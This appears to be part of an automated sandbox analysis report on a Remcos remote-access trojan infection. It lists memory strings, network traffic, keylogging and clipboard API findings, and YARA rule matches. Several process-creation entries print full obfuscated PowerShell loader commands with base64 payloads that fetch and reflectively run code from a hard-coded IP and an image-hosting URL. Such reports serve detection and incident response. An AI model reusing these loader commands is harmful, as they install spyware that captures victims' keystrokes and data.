                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: powershell.exe, 00000003.00000002.1509414066.000000000597B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                          Source: powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                          Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.8:49707 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.8:49710 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTR

                          E-Banking Fraud

                          barindex
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.3843532128.0000000002DBE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                          System Summary

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
                          Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
